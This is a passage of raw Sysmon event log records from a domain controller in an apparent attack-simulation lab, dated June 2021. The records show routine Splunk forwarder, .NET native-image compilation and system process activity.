Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000020404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.319{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.304{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.304{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.226{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D502FB1E80F9A1F23E67522CD91926,SHA256=2D59815D67DA51794946536F0CA4C7DA507F0A1EF22CF0804640013C3D006BB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.210{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.194{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.194{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:55.147{4DB9351A-A1BA-60D3-7403-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17e8-0\Microsoft.Isam.Esent.Interop.dll2021-06-23 21:03:55.147 10341000x800000000000000020434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.961{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.914{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.914{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:56.883{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cd8-0\Microsoft.KeyDistributionService.Cmdlets.dll2021-06-23 21:03:56.883 10341000x800000000000000020430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.774{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.680{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.680{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.598{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.567{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:56.489{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f4-0\Microsoft.Iscsi.Target.Commands.dll2021-06-23 21:03:56.489 23542300x800000000000000020423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.364{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F886E28DCE2F3D1C43E9FBD51D963804,SHA256=8F422DDF7BB2E4506DA97A51ED0EB73A0DFEE34F7ED679B6AAEC27251163605A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.176{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE19F8A6E399F134A994FEDEC3CCE1A8,SHA256=64B702C7B9C0874370956A3030F318F6AC69BBD805383050591D872DC9A50673,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.020{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.020{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 